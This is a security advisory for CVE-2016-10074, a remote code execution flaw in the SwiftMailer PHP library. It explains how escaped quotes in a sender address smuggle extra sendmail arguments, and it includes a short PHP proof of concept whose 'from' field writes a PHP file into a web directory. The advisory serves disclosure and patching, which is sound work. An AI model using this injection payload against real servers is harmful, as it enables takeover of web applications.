__ __ __ __ __ / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ /____/ ============================================= - Discovered by: Dawid Golunski - dawid[at]legalhackers.com - https://legalhackers.com - CVE-2016-10074 - Release date: 28.12.2016 - Revision 1.0 - Severity: Critical ============================================= I. VULNERABILITY ------------------------- SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074) II. BACKGROUND ------------------------- "Swift Mailer is a component-based library for sending e-mails from PHP applications." "Swift Mailer began back in 2005 as a one-class project for sending mail over SMTP. It has since grown into the flexible component-based library that is in development today." SwiftMailer library is used by major PHP projects including some of the most popular PHP programming frameworks such as Yii2, Laravel, Symfony. https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/introduction.rst https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/overview.rst Symfony / Yii / Laravel frameworks: http://symfony.com/doc/current/email.html https://github.com/yiisoft/yii2-swiftmailer https://laravel.com/docs/5.1/mail III. INTRODUCTION ------------------------- An independent research uncovered a critical vulnerability in SwiftMailer that could potentially be used by (unauthenticated) remote attackers to achieve remote arbitrary code execution in the context of the web server user and remotely compromise the target web application. To exploit the vulnerability an attacker could target common website components such as contact/feedback forms, registration forms, password email resets and others that send out emails with the help of a vulnerable version of the SwiftMailer class. Despite the significant efforts in responsibly disclosing the vulnerability to the vendor. The vulnerability remains unfixed as of 28 December. Note: This advisory is limited. Remaining attack vectors/exploits will be disclosed at a later date to allow more time for patching. IV. DESCRIPTION ------------------------- SwiftMailer class uses PHP mail() function as its default transport. SwiftMailer suffers from the same vulnerability as the one disclosed in PHPMailer: http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html The following Sender address: "Attacker -Param2 -Param3"@test.com would cause SwiftMailer/mail() function to execute /usr/bin/sendmail with the following list of arguments: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fAttacker -Param2 -Param3@test.com] which would not work for the attacker (Param2 and Param3 are passed within the same argument of argv[3] ) Attackers can however break out of parameter no.3 with some extra escaping. For example, by injecting an extra sequence of \" after the first argument, the following Sender email: "Attacker \" -Param2 -Param3"@test.com when passed to SwiftMailer (and eventually to mail()) function would cause sendmail to execute with: Arg no. 0 == [/usr/sbin/sendmail] Arg no. 1 == [-t] Arg no. 2 == [-i] Arg no. 3 == [-fAttacker\] Arg no. 4 == [-Param2] Arg no. 5 == [-Param3"@test.com] Which as can be seen would inject additional parameters of 4 & 5 to sendmail. Attackers can exploit this to achieve code execution as shown in the PoC below. V. PROOF OF CONCEPT EXPLOIT ------------------------- 09607 <<< 09607 <<< 09607 <<< See the full advisory URL for the exploit details. */ // Attacker's input coming from untrusted source such as $_GET , $_POST etc. // For example from a Contact form with sender field $email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com'; // ------------------ // mail() param injection via the vulnerability in SwiftMailer require_once 'lib/swift_required.php'; // Mail transport $transport = Swift_MailTransport::newInstance(); // Create the Mailer using your created Transport $mailer = Swift_Mailer::newInstance($transport); // Create a message $message = Swift_Message::newInstance('Swift PoC exploit') ->setFrom(array($email_from => 'PoC Exploit Payload')) ->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name')) ->setBody('Here is the message itself') ; // Send the message with PoC payload in 'from' field $result = $mailer->send($message); ~~~~~~~~~~~ The researcher also developed an Unauthenticated RCE exploit for a popular open-source application (deployed on the Internet on more than a million servers) as a PoC for real-world exploitation. It might be published after the vendor has fixed the vulnerabilities. Video PoC: ~~~~~~~~~~~~~ https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html VI. BUSINESS IMPACT ------------------------- A successful exploitation could let remote attackers to gain access to the target server in the context of the web server account which could lead to a full compromise of the web application. VII. SYSTEMS AFFECTED ------------------------- All versions of SwiftMailer including the latest of 5.4.5-DEV are affected. VIII. SOLUTION / VENDOR RESPONSE ------------------------- The vulnerability was responsibly disclosed to SwiftMailer vendor. The first contact attempts started on the 2nd of December. Unfortunatelly the vendor has not fixed the SwiftMailer library to date and it remains vulnerable. Because of this users of SwiftMailer (which includes various frameworks that make use of the library) remain at risk. The vendor was advised by the researcher of the upcoming exploit for another library (PHPMailer) which, when published along with the new release, would make it possible for malicious users to "connect the dots" and use the same payloads to attack SwiftMailer users. The last attempt of contact (resending the tested PoC exploit) was made on Dec 26th to which the vendor have not replied. As after the publication of PHPMailer exploit other users did start to see the similarities and file public vulnerability reports, there is no more point in keeping this advisory private. CVE MITRE assigned the following ID to this vulnerability: CVE-2016-10074 upon the request made by the researcher. IX. REFERENCES ------------------------- https://legalhackers.com This (CVE-2016-10074) advisory: https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html Video PoC: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html Exploit code: Simple PoC shown above is available here: https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt Other exploits with other attack vectors will be disclosed at a later date to allow more time for patching. CVE-2016-10074 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10074 SwiftMailer github https://github.com/swiftmailer/swiftmailer X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com Thanks to SecuriTeam for help with disclosing the vulnerability to the vendor. XI. REVISION HISTORY ------------------------- 28.12.2016 - Limited advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.